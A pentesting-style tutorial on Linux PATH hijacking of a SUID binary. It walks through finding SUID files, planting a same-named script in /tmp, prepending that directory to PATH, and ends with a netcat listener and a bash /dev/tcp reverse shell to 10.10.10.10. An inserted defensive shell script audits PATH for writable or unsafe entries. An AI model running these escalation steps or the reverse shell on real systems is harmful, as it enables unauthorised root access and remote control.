Writable $PATH
Path Hijacking
Identify the SUID file
find / -perm -4000 2>/dev/null
For example, we found a file called /usr/bin/sysedit, and this binary is called from some task or script that we control or can execute.
Create a file with malicious content
We need to create a file with the same name as the SUID binary found previously (the shebang must be "#!" and the file must be executable):
mkdir /tmp/.my-things
cd !$
echo "#!/bin/bash" > sysedit
echo "id > /tmp/.my-things/id.txt" >> sysedit
chmod +x sysedit
Update the $PATH variable
echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
export PATH=/tmp/.my-things:$PATH
echo $PATH
# /tmp/.my-things:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin
With that, our malicious folder (with the malicious file inside) becomes the first directory the system searches when (in this case) sysedit is invoked.
We need to execute the task or service that calls that file again. Instead of the normal execution, we will see:
ls /tmp/.my-things
# id.txt
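The hijack above only works because a directory the attacker controls is searched before the system directories. The following is an added example (not part of the original page) of the check a defender or auditor would run against that condition: a POSIX shell audit that reports PATH entries which are empty, relative, missing, world- or group-writable, or owned by a non-root user other than the caller. The function names audit_path and demo, and the directory layout that demo() builds under a temporary directory, are my own constructions.

```shell
#!/bin/sh
# Added example, not from the original page: audit a PATH string for
# entries that would let a lower-privileged user shadow a command.
# Portable POSIX sh; uses GNU stat and falls back to BSD stat.

# audit_path PATHSTRING
# Prints one "RISK <entry>: <reasons>" line per risky entry and returns
# the number of risky entries (0 means the PATH looks clean).
audit_path() {
    p="$1"
    me=$(id -u)
    count=0
    # A trailing ':' is an empty entry; the for-loop below would drop it.
    case "$p" in
        *:) echo "RISK <empty>: trailing ':' makes the current directory searchable"
            count=1 ;;
    esac
    old_ifs=$IFS; IFS=':'; set -f          # split on ':' only, no globbing
    for d in $p; do
        reasons=""
        case "$d" in
            "")  echo "RISK <empty>: empty entry means the current directory is searched"
                 count=$((count + 1)); continue ;;
            /*)  ;;
            *)   echo "RISK $d: relative entry, resolved against the current directory"
                 count=$((count + 1)); continue ;;
        esac
        if [ ! -d "$d" ]; then
            echo "RISK $d: does not exist (an entry that can be created is hijackable)"
            count=$((count + 1)); continue
        fi
        # Owner uid: GNU stat first, then BSD stat.
        uid=$(stat -c %u "$d" 2>/dev/null || stat -f %u "$d" 2>/dev/null)
        : "${uid:=unknown}"
        if [ "$uid" != 0 ] && [ "$uid" != "$me" ]; then
            reasons="$reasons owned-by-uid-$uid"
        fi
        # -perm -0002 / -0020 are POSIX find: world- and group-writable bits.
        [ -n "$(find "$d" -prune -perm -0002 -print)" ] && reasons="$reasons world-writable"
        [ -n "$(find "$d" -prune -perm -0020 -print)" ] && reasons="$reasons group-writable"
        if [ -n "$reasons" ]; then
            echo "RISK $d:$reasons"
            count=$((count + 1))
        fi
    done
    IFS=$old_ifs; set +f
    return $count
}

# demo: build a constructed layout under a temp dir and audit a PATH that
# mixes a sane entry, a world-writable entry, an empty entry and a missing one.
# Expected: three risky entries (dropzone, <empty>, missing); "safe" passes.
demo() {
    base=$(mktemp -d)
    mkdir "$base/safe" "$base/dropzone"
    chmod 755 "$base/safe"
    chmod 777 "$base/dropzone"
    audit_path "$base/dropzone::$base/safe:$base/missing"
    n=$?
    rm -rf "$base"
    return $n
}

# When run directly: audit the caller's own PATH and report the verdict.
if audit_path "$PATH"; then
    echo "PATH: no risky entries"
else
    echo "PATH: risky entries found"
fi
```

Run it as a normal user and as root; the owner check deliberately ignores directories owned by the caller, since the interesting case for a SUID or cron context is a directory writable by someone other than the account that will execute the command.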
If we want a Reverse Shell
On the attacking machine, listen on any port:
nc -lnvp 4460
Now create the file with the connection back to the attacker's listener:
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4460 0>&1'" > sysedit